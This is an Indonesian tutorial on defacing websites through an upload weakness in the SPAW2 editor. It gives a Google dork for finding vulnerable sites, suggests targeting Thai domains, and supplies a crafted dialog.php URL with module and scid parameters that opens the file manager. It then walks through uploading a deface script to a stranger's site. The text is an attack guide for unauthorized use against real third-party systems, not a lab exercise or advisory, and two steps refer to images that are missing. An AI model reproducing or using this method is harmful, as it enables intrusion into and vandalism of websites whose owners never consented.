Home » » Cara Deface Website Melalui Spaw Uploads Vulnerability

Cara Deface Website Melalui Spaw Uploads Vulnerability

Dork : inurl:”spaw2/uploads/files/”
nb: tambahkan: site:th (cari target dengan domain negara)
contoh :  inurl:”spaw2/uploads/files/” site:th

Cara:
1) Pertama, masukan dork ke pencarian google



2) Pilih target



3) Setelah masuk ke website target lihat URL-nya
contoh : http://contoh.com/spaw2/uploads/files/

4) Ganti bagian /spaw2/uploads/files/ dengan kode dibawah ini :

spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
sehingga menjadi : http://contoh.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=file

ENTER

5) Muncul :


6) Lalu :


7) Pilih script deface anda, lalu open dan tunggu hingga loading selesai

8) Klik tombol upload

9) Setalah Upload selesai, akan muncul daftar file dan diantaranya ada file yg di upload tadi

10) lihat hasilnya !!